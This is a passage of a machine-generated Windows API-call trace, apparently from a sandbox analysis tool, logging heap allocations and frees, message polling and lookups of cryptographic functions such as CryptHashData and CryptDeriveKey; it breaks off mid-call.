[0264.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.438] CryptHashData (hHash=0xa87290, pbData=0x2e550f8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0264.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0264.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0264.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0264.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0264.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0264.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0264.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0264.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0264.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0264.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0264.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0264.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0264.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0264.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0264.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0264.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0264.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0264.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0264.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0264.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0264.451] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0264.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0264.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0264.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0264.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55238 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0264.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0264.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0264.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0264.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0264.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0264.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0264.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0264.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0264.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0264.452] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0264.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51cb8 [0264.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.452] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55118 [0264.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0264.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0264.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0264.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0264.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0264.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0264.454] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0264.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0264.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0264.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d60 [0264.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0264.454] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0264.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0264.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0264.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0264.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0264.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0264.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0264.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0264.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0264.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0264.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0264.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0264.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0264.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0264.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0264.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0264.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0264.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0264.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0264.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0264.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0264.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0264.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0264.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0264.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0264.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0264.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0264.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0264.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0264.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0264.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0264.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0264.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0264.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0264.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0264.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0264.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0264.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0264.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0264.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0264.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0264.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0264.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0264.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0264.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0264.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0264.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0264.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0264.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0264.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0264.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51d60 [0264.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, 